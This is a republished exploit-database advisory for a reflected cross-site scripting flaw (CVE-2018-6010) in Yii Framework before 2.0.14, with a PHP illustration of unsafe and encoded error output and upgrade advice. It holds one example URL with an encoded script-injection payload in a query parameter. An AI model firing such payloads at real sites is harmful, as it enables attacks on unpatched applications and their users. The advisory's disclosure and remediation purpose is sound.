
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020115

Below is a copy:

Yii Framework 2.0.9 - Cross Site Scripting
# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting 
# Discovery Date: 2019-02-12 
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.yiiframework.com/
# Version: 2.0.9 
# CVE : 2018-6010


In Yii Framework 2.x before 2.0.14, a reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.


Example:


http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E
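
The general pattern behind this class of bug, next to the output encoding that closes it. This is an added example, not Yii's source code and not part of the original advisory; the function names, the exception text and the sample value are assumptions constructed for illustration.

```php
<?php
// Added illustration only: hypothetical function names, not Yii's implementation.

// Vulnerable pattern: the exception message, which may quote request input,
// is concatenated into the HTML error page without encoding.
function renderErrorUnsafe(Throwable $e): string
{
    return '<pre>' . $e->getMessage() . '</pre>';
}

// Hardened pattern: encode for the HTML context at the point of output,
// regardless of where the message text came from.
function renderErrorSafe(Throwable $e): string
{
    $text = htmlspecialchars($e->getMessage(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<pre>' . $text . '</pre>';
}

// Constructed sample: a request value shaped like the one in the example URL,
// assumed here to be quoted back inside an exception message.
$value = 'AAAA<script>alert("1")</script>';
$exception = new InvalidArgumentException("Invalid value: {$value}");

$unsafe = renderErrorUnsafe($exception);
$safe   = renderErrorSafe($exception);

// The unencoded page carries a live script element; the encoded one must not.
if (strpos($unsafe, '<script>') === false) {
    throw new RuntimeException('expected the unsafe rendering to contain raw markup');
}
if (strpos($safe, '<script>') !== false || strpos($safe, '&lt;script&gt;') === false) {
    throw new RuntimeException('expected the safe rendering to be entity-encoded');
}

echo "unsafe: {$unsafe}", PHP_EOL;
echo "safe:   {$safe}", PHP_EOL;
```

Per the advisory, the issue affects 2.x before 2.0.14, so upgrading to 2.0.14 or later is the remediation for Yii itself; the encoding shown here applies to any custom error view that prints exception text.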








Copyright ©2019 Exploitalert.
